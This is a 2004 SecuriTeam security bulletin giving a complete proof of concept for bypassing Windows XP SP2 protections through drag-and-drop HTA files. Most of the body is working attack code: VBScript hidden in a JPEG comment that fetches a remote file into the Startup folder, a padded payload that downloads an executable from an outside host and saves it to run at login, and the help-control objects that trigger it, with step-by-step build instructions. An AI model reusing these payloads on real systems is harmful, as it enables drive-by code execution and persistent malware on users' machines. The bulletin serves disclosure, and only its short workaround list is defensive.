[NT] How to Break Windows XP SP2 (Drag and Drop Media Files) - Proof of Concept

From: SecuriTeam (support_at_securiteam.com)
Date: 10/25/04

  • Next message: SecuriTeam: "[UNIX] Bugzilla Unauthorized Bug Modification And Information Disclosure Vulnerabilities"
    To: list@securiteam.com
    Date: 25 Oct 2004 18:54:03 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      How to Break Windows XP SP2 (Drag and Drop Media Files) - Proof of Concept
    ------------------------------------------------------------------------

    SUMMARY

    This article follows
    <http://www.securiteam.com/windowsntfocus/6N00L1FBFW.html> http-equiv's
    last article on the subject of exploiting Windows SP2 using Drag and Drop
    with .hta files to execute arbitrary code on Local Zone. In this article a
    detailed proof of concept shows the vulnerability.

    DETAILS

    It is possible to execute machine code with a series of html commands on
    an Windows XP SP2 system. Its getting harder and harder these days so be
    ready for a long confusing paper.

    Running the Proof of Concept:
     * All files for the proof of concept can be found here:
    <http://www.michaelevanchik.com/kara/scrolll/files.zip>
    http://www.michaelevanchik.com/kara/scrolll/files.zip
     * Open the index html:
    <http://www.michaelevanchik.com/kara/scrolll/index.html>
    http://www.michaelevanchik.com/kara/scrolll/index.html (or the one in
    files.zip)
     * Scroll down on this webpage and click the display button as directed.
     * You will then notice an .hta file in your: start > programs > start up
    > real sceduler.hta
     * That's it! Every time 'real sceduler.hta' runs, our code runs on Local
    Zone.

    How it Works:
    1. malwarez6.mcb:
     * Create a image file with the source code that http-equiv provided
    (shown below) into a comment section on a image file. In Photoshop it can
    be done by: file menu > file info > comment field. And paste the source
    code below.
    Here is http-equiv's code, it was modified to inject the hta file into
    start up instead.

    malwarez6.mcb comment source:
    <script language="vbs">
    Dim Conn, rs
    Set Conn = CreateObject("ADODB.Connection")
    Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
    "Dbq=http://arite.zapto.org;" & _
    "Extensions=asc,csv,tab,txt;" & _
    "Persist Security Info=False"
    Dim sql
    sql = "SELECT * from foobar.txt"
    set rs = conn.execute(sql)
    set rs =CreateObject("ADODB.recordset")
    rs.Open "SELECT * from foobar.txt", conn
    rs.Save "C:\Documents and Settings\All Users\Start
    Menu\Programs\Startup\real scheduler.hta", adPersistXML
    rs.close
    conn.close
    </script>

    Note: There is one thing you need to know about this code. Oddly, select
    * from foobar.txt not only runs a GET command for foobar.txt on the web
    server, it also logs in anonymous to a FTP server on the same host. If
    your server does not allow both, the vulnerability will not work.
     * Save the file as a jpeg. Rename it to malwarez6.mcb

    2. foobar.txt:
    This was the most difficult part. From the information http-equiv gave us,
    it seems this vulnerability could have been dismissed since you could not
    fit enough scriptable code into the hta file without the script compiler
    erroring due to binary asci code messing up the vbscript. What was
    uncovered is this text file needed to be in a comma delimited format. Not
    only that each side of each line of code needed to be padded with a dummy
    variable to keep the code "alive" so it would not error. Notice the
    variable "crap" and the first and last lines where also dummies which the
    code would not have worked without. HTA files are still a big hole for
    Microsoft. All the patching they have done to exploits, and the creation
    of XP Service Pack 2 was gods sent, but yet HTA files do not apply to ANY
    of these new features. So in the end it's simply the matter of putting an
    old and easy exe running exploit inside this hta file.

    foobar.txt source:
    "meaning less shit i had to put here"
    "<script language=vbscript> crap = """
    """: on error resume next: crap = """
    """ : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
    """ : o.open ""GET"",""http://hometown.aol.com/mcbain/calc.exe"",False :
    crap="""
    """ : o.send : crap="""
    """ : set s = createobject(""adodb.stream"") : crap="""
    """ : s.type=1 : crap="""
    """ : s.open : crap="""
    """ : s.write o.responseBody : crap="""
    """ : s.savetofile ""C:\Documents and Settings\All Users\Start
    Menu\Programs\Startup\RealAudio.exe"",2 : crap="""
    """</script> crap="""

    3. index.html:
    Notice the following key code: <img id="dyn" src="malwarez6.mcb"
    border="0">
    According to <malware.com> http-equiv's post he was using a file with no
    extension. This did not work for Michael Evanchik on his IIS server so an
    unused extension that was used (.mcb). From there in IIS management
    console this mime type was added manually (.mcb text/html) entry. This
    image now gets by Microsoft's patch of not allowing executable content to
    be "draggable". Microsoft seems to check (no matter what extension of the
    file, or content type your http server sends) the file internally to see
    if it is not an executable file.

    4. cigar.hhk:
    The code in this file is self explanatory:
    <OBJECT type="text/site properties">
        <param name="WindowName" value="$global_blank">
    </OBJECT>
    <UL>
        <LI> <OBJECT type="text/sitemap">
            <param name="Name" value="click display at bottom of page">
                    <param name="Local"
    value="C:\WINDOWS\PCHealth\malwarez6[1].htm">

            <param name="WindowName" value="$global_blank">
            </OBJECT>
    </UL>

    5. frame.html:
    Most somewhat self explanatory, though note the following code:

     <OBJECT style="height:650" style="width:250"id="hhctrl"
    type="application/x-oleobject"
    classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">
        <PARAM name="Command" value="Index">
        <PARAM name="Item1" value="cigar.hhk">click me
    </OBJECT>

    Unfortunately, this object cannot be auto clicked with hhctrl.click(), so
    for now this is the only user intervention part. But when a user click
    this object, it runs the html file in local zone, bypassing XP Service
    pack 2 for the second time in this exploit.

    6. hhtctrl.ocx:
    The hhtctrl.ocx should be uploaded for computers that dont happen to have
    this control. All XP's seem to have this by default, some win2k3's do not.

    Workarounds:
     * Disable hta files.
     * Disable scripting in Internet Explorer
     * Do not use Internet Explorer, use <http://mozilla.org> Mozilla Firefox

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:Mike@MichaelEvanchik.com>
    Michael Evanchik.
    The original article can be found at:
    <http://www.michaelevanchik.com/kara/scrolll/notagain.txt>
    http://www.michaelevanchik.com/kara/scrolll/notagain.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] Bugzilla Unauthorized Bug Modification And Information Disclosure Vulnerabilities"

    Relevant Pages

    • [UNIX] mod_security Buffer Overflow (Service Side Include)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... regardless of the size of incoming data. ... when data is sent by server side script. ... The buffer is overflowed when server side script is generating large ...
      (Securiteam)
    • [NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password De
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... HP Web JetAdmin is an enterprise management system for large amounts of HP ... The web server is a modular service ... HP Web JetAdmin uses it's own encryption. ...
      (Securiteam)
    • [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were discovered in the (Oracle database server ... password is required to exploit this vulnerability. ...
      (Securiteam)
    • [NEWS] ColdFusion MX Oversize Error Message DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ColdFusion MX "is the solution for building and deploying powerful web ... shoots up and stays there until the server completes writing the error ... a long string of data as a GET or POST request to ...
      (Securiteam)
    • [NT] F-Secure Internet Gatekeeper Content Scanning Server DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... " <http://www.f-secure.com/products/anti-virus/fsigk/> F-Secure Internet ... the Content Scanner Server. ... The vendor has been contacted and confirmed the existence of the problem ...
      (Securiteam)